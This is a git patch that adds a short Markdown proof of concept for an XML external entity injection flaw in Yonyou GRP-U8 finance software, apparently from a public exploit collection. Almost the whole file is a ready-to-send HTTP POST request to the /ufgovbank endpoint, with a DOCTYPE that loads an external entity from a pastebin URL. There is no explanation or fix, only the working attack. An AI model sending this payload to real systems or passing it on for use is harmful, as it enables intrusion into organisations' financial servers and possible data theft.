From d808fc5577540b8e33b43285081d91a16fae2f0a Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sun, 20 Aug 2023 09:28:43 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E7=94=A8=E5=8F=8BGRP-U8=E5=AD=98?=
 =?UTF-8?q?=E5=9C=A8XML=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 用友GRP-U8存在XML注入漏洞.md | 19 +++++++++++++++++++
 1 file changed, 19 insertions(+)
 create mode 100644 用友GRP-U8存在XML注入漏洞.md

diff --git a/用友GRP-U8存在XML注入漏洞.md b/用友GRP-U8存在XML注入漏洞.md
new file mode 100644
index 0000000..f097198
--- /dev/null
+++ b/用友GRP-U8存在XML注入漏洞.md
@@ -0,0 +1,19 @@
+## 用友GRP-U8存在XML注入漏洞
+
+```
+
+漏洞文件为：WEB-INF/classes/com/ufgov/bank/ufgovBank.class
+
+POST /ufgovbank HTTP/1.1
+
+Host: 127.0.0.1:8089
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 186
+ 
+reqData=<?xml version="1.0"?>
+<!DOCTYPE foo SYSTEM "https://pastebin.com/raw/E2d5s60p">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
+
+```